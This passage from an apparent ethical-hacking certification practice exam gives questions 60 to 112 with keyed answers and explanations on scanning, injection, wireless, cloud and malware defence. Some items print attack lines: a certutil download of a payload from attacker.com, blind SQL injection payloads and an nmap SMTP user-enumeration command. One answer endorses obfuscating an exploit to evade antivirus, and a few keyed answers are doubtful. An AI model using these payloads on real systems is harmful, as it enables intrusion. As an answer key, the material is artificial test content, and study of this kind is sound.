    Correct answer: A. An attack where compromised internal devices participate in a botnet and flood external targets with traffic.

    The correct answer describes a botnet-based DDoS where compromised internal devices flood external targets. Option B is a misdirection to amplify traffic through DNS, which isn't occurring here.

  60. Question 60 of 148While auditing an Azure environment, you find a 'Managed Identity' assigned to a Virtual Machine with 'Contributor' permissions on a Subscription. How can an attacker on that VM exploit this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. By querying the Instance Metadata Service (IMDS) to get a token and then using Azure CLI to manage resources.

    An attacker on the VM can query IMDS to get a token and use Azure CLI to manage resources with the 'Contributor' permissions. Option A is invalid as Managed Identity has no password to brute-force.

  61. Question 61 of 148As a newly appointed network security analyst at a mid-tier company, you have been tasked with assessing the security of the network. As part of this, you need to ensure that your company's network can detect and prevent evasion techniques. You know that one popular evasion technique used by attackers is using 'packet fragmentation'. Which of the following IDS configurations should you implement to counteract this particular technique?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Implementing an anomaly-based IDS that can recognize the irregular traffic patterns caused by packet fragmentation.

    Anomaly-based IDS detects irregular patterns from packet fragmentation, unlike signature-based methods. Option B is a poor choice as rejecting all fragments breaks normal network traffic.

  62. Question 62 of 148As a certified ethical hacker, you have been tasked to exploit a security vulnerability on an Android device that uses the latest version of the OS. You found that there's an unpatched weakness in the handling of user permissions in the device, but the device has a fully updated anti-virus application installed. What would be the most effective approach to exploit this vulnerability without being detected by the anti-virus application?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Develop a custom exploit code that uses obfuscation techniques to avoid detection.

    A custom obfuscated exploit avoids detection by signature-based antivirus. Option A is weak because Metasploit payloads are well-known and likely detected.

  63. Question 63 of 148A malware analyst is tasked with evaluating a suspicious PDF file suspected of launching attacks through embedded JavaScript. Initial scans using pdfid show the presence of JavaScript and /OpenAction keywords. What should the analyst do next to understand the potential impact?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Extract and analyze stream objects using PDFStreamDumper.

    PDFStreamDumper directly examines embedded streams where malicious JavaScript hides. Option A is passive, B finds signatures but not code, and C applies to PE files, not PDFs.

  64. Question 64 of 148As a cybersecurity professional in a growing organization, you are tasked with conducting comprehensive reconnaissance of your own company's digital presence. In addition to using tools like WHOIS, DNS analysis, and search engines, you are also considering investigating the Deep Web. Which of the following justifications best supports your idea to explore the Deep Web for potential risks related to your organization's information? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Search engines don't index the Deep Web, and there could be non-indexed company information lying there.

    Search engines do not index the Deep Web, so information stored there remains hidden. Options B, C, and D are misinformed or irrelevant to passive reconnaissance.

  65. Question 65 of 148As a cybersecurity professional in XYZ Corporation, you've been assigned to investigate an anomaly in the system logs that suggest possible unauthorized activities. The system administrators detected repeated failed login attempts on a critical server, followed by a sudden surge in outbound data traffic. These events, while discrete, are raising concerns that the system may have been compromised. Given the high stakes and sophisticated nature of this potential security breach, what should be your initial course of action to manage this situation effectively?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Conduct real-time monitoring of the server, scrutinize the logs for unusual patterns, and identify the nature of the activities to devise an immediate countermeasure.

    The correct initial action is real-time monitoring to understand the threat before acting. This prevents premature actions like disconnecting the server, which could destroy evidence needed for a proper investigation.

  66. Question 66 of 148As a cybersecurity consultant, you are helping a small startup strengthen its information security awareness. During an internal audit, an employee reports finding a USB drive labeled "Employee Salary Info 2024" in the company parking lot. Curious, they plugged it into their office computer, after which the system began behaving erratically. What kind of social engineering attack does this scenario represent?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Tempting the victim to engage with a malicious device using curiosity.

    This is a classic baiting attack, exploiting the victim's curiosity. The 'Employee Salary Info' label is designed to trigger an emotional response, leading to the malicious act of plugging in the device.

  67. Question 67 of 148As a security analyst, you're investigating an incident where an attacker was able to gain access to your network. Upon initial examination of the log files, you noticed a large number of TCP SYN packets sent to various ports on the network but with no corresponding ACKs. What type of scanning technique do you think the attacker may have used?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The attacker has used a SYN scan, also known as half-open scanning, which involves sending SYN packets and waiting for SYN/ACK responses.

    The attack is a SYN scan because it sends SYN packets to initiate a connection but does not complete the handshake, allowing it to scan for open ports without logging a full connection attempt.

  68. Question 68 of 148A company's customer data stored in a cloud environment has been exposed due to an unknown vulnerability. Which of the following types of attack most likely led to this incident? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Exploitation of misconfigured security groups

    Misconfigured security groups are a primary cause of data breaches in cloud environments, as they can accidentally expose storage buckets or virtual machines to the public internet.

  69. Question 69 of 148As a newly appointed ethical hacker for XYZ Corporation, you have been assigned your first major task. The company has been facing persistent cyber threats and as a precautionary measure, you are tasked to conduct a thorough network vulnerability assessment. Your key objective is to efficiently map out all open ports and associated services in the organization's expansive network. Simultaneously, it's of paramount importance that your activities remain stealthy and do not trigger the advanced intrusion detection systems (IDS) employed by the organization. Given these requirements, which scanning technique would you opt for to achieve your task with maximum efficacy and discretion?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Stealth Scan (SYN Scan)

    A SYN scan is the ideal choice because it's a half-open connection that doesn't complete the TCP handshake, making it stealthy and less likely to trigger traditional IDS signatures.

  70. Question 70 of 148Which of the following best describes the role of a penetration tester? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. A security professional hired to identify and exploit vulnerabilities with permission

    This correctly defines a penetration tester as an authorized professional who mimics an attack to find vulnerabilities, which distinguishes them from malicious hackers.

  71. Question 71 of 148During an internal security audit, the cybersecurity team at a large healthcare organization detects abnormal patterns in DNS resolution behavior on the corporate internal network. Several employees report that when they attempt to visit legitimate internal and external websites, they are redirected to login pages that appear slightly altered. Upon deeper inspection, security logs reveal that DNS responses are being returned from an internal IP address that is not an authorized DNS server. These rogue responses are consistently faster than the legitimate replies from the corporate DNS server. Around the same time, network monitoring tools register a sharp spike in ARP spoofing alerts originating from a specific subnet. The organization becomes concerned that sensitive login credentials and personal health data may have been intercepted by an insider. Given this scenario, what type of sniffing-based attack is most likely being executed?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Intranet DNS poisoning via local spoofed responses.

    This is intranet DNS poisoning because the attack is happening internally with rogue DNS responses, confirmed by the faster spoofed replies and ARP spoofing on the local network.

  72. Question 72 of 148During a red team exercise, an attacker dresses as a network technician and gains unchallenged access to a restricted area. Once inside, he roams freely, observing employees and reviewing sensitive documents left unattended. Which of the following tactics best represents this scenario? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Gaining physical access by assuming the identity of a trusted internal staff.

    This question perfectly tests social engineering tactics, specifically physical impersonation, a core red teaming skill. The wrong options are weaker because they describe different attack vectors like dumpster diving and phishing.

  73. Question 73 of 148As a cybersecurity analyst for a leading multinational company, you have unearthed evidence suggesting a breach. Analysis indicates that sophisticated steganography techniques are in play, allowing the hacker to exfiltrate data by cleverly embedding it within image files. Confronted with the deceptive nature of steganography and its potential implications, which course of action offers the best chance to detect and counteract this clandestine threat?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Engage a specialized steganalysis tool to scrutinize questionable files, decode the obscured data, and reveal the hacker's exfiltration methodology.

    This directly tests steganalysis knowledge for detecting data exfiltration, a key forensic skill. The trap is that network-based tools can't detect hidden data within files.

  74. Question 74 of 148As a Certified Ethical Hacker, you have been approached by a leading international corporation to assess and enhance their cloud-based security framework. The corporation recently transitioned to a serverless computing architecture for its e-commerce application and experienced significant improvements in scalability and cost-efficiency. However, they fell victim to an intricate attack where an unauthorized user manipulated their cloud service's function-as-a-service (FaaS) component to execute malicious commands. Your investigation revealed that the attack originated from an insecure third-party API used within one of the serverless functions. Given the attack's complexity, what would be your recommended countermeasure for strengthening the security posture?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Implementing a function-level permission model and enforcing the principle of least privilege.

    This is an excellent question for modern cloud security, testing least privilege in serverless architectures. It correctly identifies that function-level permissions are the most direct countermeasure to the attack described.

  75. Question 75 of 148An ethical hacker is conducting a penetration test on a company's network with full knowledge and permission from the organization. What is this type of hacking called? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. White Hat Hacking

    White Hat Hacking is correct because it explicitly involves authorized, ethical penetration testing with permission. Other options imply unauthorized or malicious activity.

  76. Question 76 of 148A company implements WPA3 for its internal Wi-Fi. An attacker attempts a 'KRACK' attack (Key Reinstallation Attack). Why is WPA3 more resilient to this than WPA2?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. WPA3 uses the Simultaneous Authentication of Equals (SAE) protocol, which is resistant to passive observation and key reinstallation.

    WPA3 uses SAE, which is resistant to key reinstallation. Option C is a trap because SAE replaces, not disables, the handshake.

  77. Question 77 of 148During an ethical hacking exercise, a security analyst is testing a web application that manages confidential information. The analyst suspects the application may be susceptible to SQL injection attacks. Which of the following payloads will most likely reveal if the application is vulnerable to time-based blind SQL injection attacks?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. ' AND BENCHMARK(5000000,ENCODE('test','test')); —

    The BENCHMARK payload introduces a delay to test time-based vulnerabilities. Option B is a trap because it tests for basic SQL injection, not blind injection.

  78. Question 78 of 148An ethical hacker is auditing a hospital's wireless network, which is currently secured with WPA encryption using TKIP. The hacker successfully demonstrates packet-injection and decryption attacks on the network. Which vulnerability in WPA most likely allowed these attacks to succeed?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Use of weak Initialization Vectors (IV).

    TKIP's weak IVs are a known flaw that allows for decryption and packet injection attacks. While WPA2 with AES is secure, WPA with TKIP is vulnerable.

  79. Question 79 of 148A critical infrastructure facility has an extensive network of IoT devices integrated with its OT systems. Following a recent surge in cyberattacks on similar facilities globally, the security team received an anonymous email detailing a possible attack on their systems. The attacker allegedly plans to compromise the IoT devices and use them as a gateway to the OT systems. What should be the immediate action of the security team to mitigate this threat?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Employ an intrusion prevention system (IPS) on the network to detect and block any malicious activities.

    An IPS can detect and block malicious activity from compromised IoT devices. While other options are good long-term strategies, the immediate action is to block the attack.

  80. Question 80 of 148A red team simulation reveals a malware strain that adapts its behavior based on observed user activity and evades detection by altering its code dynamically. The malware exfiltrates data only when the system is idle and uses encrypted channels for communication. Based on these traits, what is the most probable nature of this malware?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. AI-powered malware using machine learning to tailor its execution.

    The malware's adaptive behavior and use of machine learning points to AI-powered malware. Polymorphic viruses change signatures, but don't adapt based on user behavior.

  81. Question 81 of 148In a comprehensive penetration testing scenario, you are charged with the task of gaining detailed insights into a target organization's network configuration, structure, and security posture. To accomplish this task, you plan to employ a multitude of reconnaissance techniques, including an in-depth DNS interrogation. DNS interrogation can reveal various pieces of information that are invaluable to a penetration tester. However, there are certain limitations to the kind of data you can obtain directly through this method. Considering these restrictions, which among the following pieces of information CANNOT be directly obtained from an extensive DNS interrogation? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. The specific usernames and passwords used by the organization's employees.

    DNS queries reveal domain mappings, not private credentials like usernames and passwords. Other options are valid DNS data points, making option A the clear incorrect answer.

  82. Question 82 of 148At XYZ Corporation, a multinational firm known for its digital services, the cybersecurity team is tasked with ensuring a robust, secure network environment. This responsibility includes maintaining a keen focus on vulnerability assessment and patch management strategies to guard against potential threats, including the increasingly prevalent zero-day attacks. Recent intelligence has alerted the team to a concerning issue: the primary web server software that the corporation relies on for its critical operations has been hit with a newly discovered zero-day vulnerability. Alarmingly, this vulnerability is not just theoretical; active exploitations of this vulnerability have been spotted in the wild, making the threat immediate and real. However, the vendor of the software, caught off guard by the discovery, has not yet released an official patch to mitigate this vulnerability. Given these circumstances, what is the FIRST step that the cybersecurity team at XYZ Corporation should undertake to manage the significant risk posed by this unpatched zero-day vulnerability?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Swiftly apply a virtual patch to the affected web server using a web application firewall to temporarily safeguard against potential exploits.

    A virtual patch via a WAF provides immediate protection against an unpatched zero-day. Shutting down the server is not the 'first' step.

  83. Question 83 of 148Which AI-specific threat involves an attacker querying an ML model repeatedly to reconstruct the underlying training data or the model's logic? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Model Extraction (or Inversion)

    Model Extraction involves repeatedly querying an AI model to steal its underlying data or logic. This is a direct threat to intellectual property.

  84. Question 84 of 148As an Ethical Hacker, you've been asked to test an application's vulnerability to SQL injection. In the process, you discover an entry field that appears susceptible. However, the backend database is unknown, and regular SQL injection techniques have so far failed to elicit useful information. Which advanced SQL Injection technique should you apply next?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Time-Based Blind SQL Injection

    Time-based blind SQL injection is right because it uses response delays to infer truths when standard techniques fail. The other options require visible errors or known database structures.

  85. Question 85 of 148You've been hired as a Certified Ethical Hacker (CEH) by a large multinational corporation to investigate the unauthorized access of sensitive data from their web application. You discover that the web application uses a custom authorization scheme involving token-based authentication. The system issues tokens, which expire after 30 minutes. In the server logs, you notice multiple failed login attempts using expired tokens within a 3-minute window, followed by successful access with a valid token. You suspect that an attacker exploited the authorization scheme. What could be the most likely attack scenario?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The attacker captured a valid token before its expiry and used it to gain access.

    Capturing a valid token before expiry matches the observed pattern. The other options don't explain the expired token attempts followed by success.

  86. Question 86 of 148You are a security administrator for a medium-sized company. Your manager has asked you to conduct an audit of the organization's security infrastructure. While reviewing the logs from the Intrusion Detection System (IDS), you notice that there have been several instances of alerts being triggered by regular user activities. Which of the following is the most likely reason for this?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The IDS is configured with very high sensitivity settings, leading to many false positives.

    High sensitivity settings cause false positives by flagging normal activity as threats. The other options imply system failures rather than configuration issues.

  87. Question 87 of 148A government agency trains a group of cybersecurity experts to carry out covert cyber missions against foreign threats and gather intelligence without being detected. These experts work exclusively for national interests. What classification best describes them?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. State-sponsored hackers

    State-sponsored hackers is the correct answer as they act directly for a government's national interests. Organized, gray hat, and hacktivists lack the official government backing described in the scenario.

  88. Question 88 of 148During an internal penetration test, a security analyst assesses a web application that interfaces with a backend Oracle database. Initial attempts using standard SQL injection payloads such as ' OR '1'='1 and UNION SELECT return no useful output and do not affect application behavior. Suspecting input sanitization and error suppression, the analyst crafts a new payload: 1 AND 1 < (SELECT COUNT(*) FROM all_users A, all_users B, all_users C) Upon submitting this payload, the page takes significantly longer to respond compared to previous inputs, even though no visible output is returned. What type of SQL injection technique is most likely being used here?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Heavy query-based SQL injection

    Heavy query-based SQL injection is the correct answer because the payload causes a significant delay by overloading the database with complex queries. The WAITFOR DELAY technique is specific to SQL Server, while this payload is a generic stress test.

  89. Question 89 of 148As a cybersecurity analyst, you were assigned the task of analyzing the traffic patterns of your company's network. You started noticing irregularities that suggested a potential scanning attempt. The attacker appears to be quite sophisticated, operating slowly and meticulously, making it a challenge to detect or trace. Given the stealthiness of this approach, which of the following scenarios best describes the scanning technique the attacker might be using?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The attacker is utilizing a 'zombie' machine to transmit the scan, thus making the true source of the scan difficult to determine.

    Using a 'zombie' machine is the correct answer because it obscures the attacker's true source, making the scan stealthy. The other methods are more direct and easier to trace back to the source.

  90. Question 90 of 148A multinational corporation provides its employees with mobile devices to support remote work and enhance productivity. Recently, the security team detected suspicious activities indicating potential vulnerabilities in the mobile platforms, raising concerns about unauthorized access and data leakage. The team is tasked with identifying advanced hacking techniques targeting mobile platforms and implementing robust measures to enhance mobile security and prevent intrusions. Given the scenario described, which sophisticated hacking technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the security of the multinational corporation's mobile platforms?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Remote Access Trojan (RAT) Implanting Malicious Software on Mobile Devices to Gain Unauthorized Remote Access and Monitor User Activities, such as Keystrokes and Screen Capture

    This is correct because RATs provide stealthy remote access, making them hard to detect. The trap is distinguishing between active attacks and passive vulnerabilities.

  91. Question 91 of 148A logistics company recently found that some of its fleet vehicles equipped with smart locking systems were compromised, leading to vehicle thefts. The cybersecurity team suspects that attackers captured unique signals emitted by the key fobs during regular usage. To effectively confirm and prevent this attack in the future, what should the security team prioritize?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Monitor wireless signals for abnormal jamming or interference.

    This is correct because signal jamming reveals key fob replay attacks. The trap is confusing digital security with physical measures.

  92. Question 92 of 148As a cybersecurity analyst at XYZ Corp., you're examining system logs and notice an array of activities that suggest the presence of an elusive rootkit. Given the stealthy nature of rootkits, their detection and eradication are pivotal to maintaining system security and preventing data compromise. Assessing the system, you find the rootkit has been embedded deeply within the operating system kernel. In this critical situation, which strategy should you follow to remediate the rootkit effectively while minimizing potential damage?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Employ a systematic, multi-layered strategy, starting with the deployment of a specialized rootkit detection tool to verify the presence and type of rootkit, followed by an appropriately tailored removal procedure, specific to the identified rootkit.

    This is correct because kernel rootkits need specialized detection and removal. The trap is overreacting with honeypots or full reinstallation.

  93. Question 93 of 148In a healthcare organization, the network security team detects unusual network activity, indicating advanced sniffing techniques used by a potential attacker. Upon investigation, it's found that the attacker exploits vulnerabilities in medical imaging protocols to intercept patient data. The security team must identify the specific sniffing technique being used and take action to protect patient privacy. Considering the scenario, which sophisticated sniffing technique poses the greatest challenge for the security team, potentially compromising patient data security?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Exploiting MRI machine firmware vulnerabilities to intercept real-time patient scans.

    Exploiting MRI firmware vulnerabilities is a sophisticated attack targeting medical devices directly, making it highly difficult to detect without specialized monitoring. The other options focus on administrative manipulation rather than direct network-level interception.

  94. Question 94 of 148A city's power management utilizes SCADA systems to oversee operations. Recently, the infrastructure has shown unexplained anomalies such as inconsistent sensor values and intermittent outages. Security experts suspect a side-channel attack aiming to discreetly extract sensitive information from SCADA devices. Which investigative technique would best confirm if attackers employed this specific side-channel method?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Measure unusual fluctuations during device operations at the hardware level.

    Side-channel attacks exploit physical characteristics like power fluctuations, requiring hardware-level monitoring to detect. Network latency or UI reviews might indicate other issues, but hardware-level analysis is the definitive method for confirming side-channel leakage.

  95. Question 95 of 148A cybersecurity team at a multinational company notices unusual network traffic on their Bluetooth devices. It is suspected to be a Bluesnarfing attack, aimed at accessing unauthorized information from Bluetooth-enabled devices. Which of the following would be the most effective countermeasure to prevent further unauthorized access? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Disable "Discoverable Mode" and activate "Non-discoverable Mode" on all Bluetooth devices.

    Disabling discoverable mode prevents attackers from detecting Bluetooth devices, the first step in Bluesnarfing. Firmware updates and strong PINs are secondary defenses; encryption doesn't prevent discovery-based attacks.

  96. Question 96 of 148A prominent healthcare organization relies on mobile platforms to access electronic health records (EHR) and facilitate communication among healthcare professionals. Recently, the security team detected suspicious activities indicating potential vulnerabilities in the mobile platforms, raising concerns about unauthorized access to sensitive patient data and potential breaches of medical privacy laws. The team is tasked with identifying advanced hacking techniques targeting mobile platforms and implementing robust measures to enhance mobile security and protect patient confidentiality. Given the scenario described, which sophisticated hacking technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the security of the healthcare organization's mobile platforms?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Zero-Day Exploits Leveraging Previously Unknown Vulnerabilities in Mobile Operating Systems or Applications to Gain Unauthorized Access to Healthcare Data and Patient Records

    Zero-day exploits are correct because they use unknown vulnerabilities, making them extremely hard to detect. App spoofing and bluejacking are easier to spot with mobile device management.

  97. Question 97 of 148A cybersecurity analyst working for a multinational corporation is tasked with performing regular surveillance of their competitors' digital presence to identify any changes that could indicate strategic shifts or potential threats. To stay updated on their competitors' web content updates, the analyst has devised a plan to use several tools and techniques to achieve his objective efficiently. However, there is a key component in his strategy that he overlooked. Which of the following is the most crucial aspect he should add to ensure the effective implementation of his surveillance strategy?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Set up Google Alerts to receive email notifications whenever new web content includes their competitors' names or other key terms.

    Google Alerts are the best choice for automated monitoring. VPNs don't track changes, hacking is unethical, and forum engagement is inefficient and risky.

  98. Question 98 of 148During a black-box assessment, an attacker executes the Nmap command: nmap -p25 –script smtp-enum-users –script-args smtp-enum-users.methods={VRFY, EXPN, RCPT} <target IP>. The script successfully returns multiple valid usernames. What server misconfiguration is being exploited?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. SMTP user verification commands are exposed without restrictions.

    Unrestricted user verification commands allow easy username enumeration. Disabling STARTTLS or allowing auth without credentials are different security issues.

  99. Question 99 of 148As an IT technician in a small software development company, you are tasked with providing security against different kinds of cyber threats. You learn about various methods hackers might use to bypass your company's firewalls. Which of the following is a common technique used by attackers to evade firewall detection? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Changing the source IP address of packets to appear as if the traffic is coming from a trusted source.

    IP spoofing allows attackers to bypass firewall rules that rely on trusted source IP addresses. This is a classic firewall evasion technique that attackers frequently use to appear legitimate.

  100. Question 100 of 148A red teamer uses 'Certutil.exe -urlcache -f http://attacker.com/payload.exe' to download a file. How does an EDR typically detect this Living-off-the-Land (LotL) activity?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. By monitoring command-line arguments and unusual network connections from system binaries.

    EDR detects LotL activities by monitoring suspicious command-line arguments from trusted system binaries and their corresponding unusual network connections.

  101. Question 101 of 148Upon analyzing anomalies in your network's traffic, you discover traces of an insidious malware strain named "ShadowFlee." This malware operates without writing files to disk, harnessing system utilities and scripts like PowerShell to stealthily execute tasks, effectively evading traditional detection mechanisms. Further, it exploits legitimate processes to propagate internally. Given "ShadowFlee's" elusive attributes, which strategy would offer the most focused countermeasure?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Restrict and monitor the execution of scripts and system tools, especially those invoked by unsanctioned processes.

    Restricting and monitoring script execution counters fileless malware like ShadowFlee that exploits system tools. Option A is too broad; C and D don't directly address memory-based threats.

  102. Question 102 of 148As a senior cybersecurity professional at a multinational bank, you are investigating an incident where multiple systems have been infected with malware. On the affected systems, the malware remains dormant until a specific action triggers its malicious activity. The malware has also shown signs of being able to avoid detection by changing its code or encryption each time it infects a new. Based on these characteristics, which type of malware is likely causing this problem, and what is the best method to mitigate its impact?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Polymorphic Malware: Employ advanced threat detection tools that use behavior-based detection techniques and ensure all systems are patched.

    Polymorphic malware changes its code to evade detection, making behavior-based tools and patching the best defense. Option A is a generic worm response that misses the evasion clue.

  103. Question 103 of 148You are a Certified Ethical Hacker contracted by a technology company to perform a security assessment on Bluetooth-enabled devices. These devices have Secure Simple Pairing (SSP) enabled, which generally offers strong security. During your assessment, you identify an attacker trying to exploit a vulnerability in the SSP implementation by employing sophisticated brute-force techniques. The attacker has partial access to the Diffie-Hellman key exchange. Your mission is to identify the most effective method to counteract this attack. Which of the following countermeasures is most likely to be effective?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Impose rate-limiting to slow down the brute-force attack.

    Rate-limiting is the most direct counter to a brute-force attack, slowing the attacker down. Option D is a trap because increasing key length doesn't stop brute-force of the DH exchange.

  104. Question 104 of 148A leading online retailer has been experiencing a series of security incidents involving unauthorized access to customer accounts and fraudulent transactions. Upon investigation, it is suspected that attackers are employing sophisticated session-hijacking techniques to compromise user sessions and carry out illicit activities. The security team is tasked with implementing robust measures to prevent further breaches and protect customer trust. Given the scenario described, which advanced session hijacking technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially compromising the security of online transactions on the retailer's website?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Session Replay Attack Capturing and Replaying Encrypted Session Tokens to Gain Unauthorized Access

    Session replay attacks are stealthy, using real captured tokens to impersonate users. Option A is client-side, B requires user action, and D relies on known credentials.

  105. Question 105 of 148As a cybersecurity analyst working for a multinational corporation, you are tasked with the responsibility of conducting routine vulnerability scans. This time around, you decided to use a different strategy and opted to employ a FIN scan, which is a type of stealth scanning technique. Upon conclusion of your scan, you notice an interesting anomaly – a significant number of ports did not respond to your FIN packets. With this unexpected result, you are now faced with the challenge of correctly interpreting the findings and planning the next course of action. Based on your understanding of FIN scanning and TCP/IP protocols, how should you interpret these findings? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Consider the possibility of a firewall blocking the FIN packets and investigate further.

    Firewalls often block FIN scans, so a lack of response requires investigation. Option C is incorrect because only RST/ACK indicates a closed port in this context.

  106. Question 106 of 148During a routine security audit, administrators found that cloud storage backups were illegally accessed and modified. What countermeasure would most directly mitigate such incidents in the future?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Adopting the 3-2-1 backup model.

    The 3-2-1 model ensures backups are stored offsite and redundant, preventing single points of failure. Options A, C, and D are unrelated to data integrity.

  107. Question 107 of 148A security analyst working for a large financial corporation has been assigned to conduct a comprehensive penetration test on the corporation's wireless infrastructure. The infrastructure relies on a secured WPA2-PSK-secured network to ensure data protection. During the course of the examination, the analyst discerned a significant vulnerability within the network that could potentially be exploited. Which of the subsequent options most accurately delineates the procedure that the analyst might have employed to pinpoint this particular vulnerability?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. The analyst instigated a de-authentication attack, purposely causing a mass disconnection of all clients from the access point. The analyst then attentively observed the four-way handshake process that occurred during the clients' reconnection attempts.

    De-authentication attacks force clients to reconnect, allowing capture of the four-way handshake. Options A, B, and D describe different attacks or incorrect methods.

  108. Question 108 of 148A globally-operating bank recently encountered a severe security breach within its Android OS-based mobile banking application. Cybercriminals managed to exploit the bank's Mobile Device Management (MDM) system and successfully carried out a series of remote commands, creating significant havoc. Upon thorough investigation of this incident, it emerged that the attackers might have leveraged the Android Debug Bridge (ADB) as a conduit for unauthorized access. As a Certified Ethical Hacker tasked with developing countermeasures to this issue, which action would you consider the most potent response in this situation?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: C. Establishing and enforcing a rigorous policy that unequivocally mandates the disabling of ADB, except when absolutely necessary and only within strictly regulated environments.

    Disabling ADB is the most potent response because it eliminates the attacker's primary attack vector. Other options, while good security practices, do not directly close this specific access point.

  109. Question 109 of 148A major financial institution is experiencing persistent Denial-of-Service (DoS) attacks targeting its online banking services, causing significant disruption to customer transactions and eroding trust in the institution. The security team is under immense pressure to identify and mitigate the sophisticated tactics employed by the attackers to ensure uninterrupted access to banking services. Considering the scenario described, which sophisticated Denial-of-Service (DoS) technique, resembling a scenario-based attack, poses the greatest challenge for the security team to detect and mitigate effectively, potentially jeopardizing the availability of online banking services?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. A coordinated UDP flood attack exploiting vulnerabilities in the institution's DNS infrastructure, flooding authoritative DNS servers to disrupt domain resolution services.

    A coordinated UDP flood against DNS is most challenging because it disrupts fundamental services, and legitimate DNS traffic can mask malicious packets, making detection difficult.

  110. Question 110 of 148The web application security team of a global firm detected a sophisticated Injection attack that exploited a flaw in the application's input validation. The attack was carried out using a custom script that used obfuscation and evasion techniques to bypass security measures. To counter such attacks in the future, the security team is considering implementing additional security measures. Which of the following would be the most effective?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: D. Deploy a Web Application Firewall (WAF) with built-in evasion detection features.

    A WAF is the most effective countermeasure because it sits between the application and traffic, providing real-time inspection and filtering to block injection attempts with evasion techniques.

  111. Question 111 of 148A company implements WPA3-Enterprise for its wireless network. An attacker attempts a 'Downgrade Attack' to force the client to use WPA2. Which WPA3 feature is designed to prevent this? Correct answer

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: A. Transition Disable element

    The Transition Disable element is specifically designed to prevent downgrade attacks, stopping a client from being forced to revert to the less secure WPA2 protocol.

  112. Question 112 of 148During a red team exercise, a certified ethical hacker (CEH) is working on exploiting a potential vulnerability in the target's web server. The CEH has completed the information gathering and footprinting stages and mirrored the website for offline analysis. They have also discovered the server is prone to session hijacking. Which next step is most likely to be part of a successful attack methodology, keeping in mind the requirement to minimize the possibility of detection?

    Tap an answer — you get instant feedback and the reasoning.

    Show answer & explanation

    Correct answer: B. Attempt SQL Injection to extract database information.

    SQL injection is the logical next step after footprinting and identifying a session hijack vulnerability, as it directly exploits the web application and could provide database credentials for a session takeover.

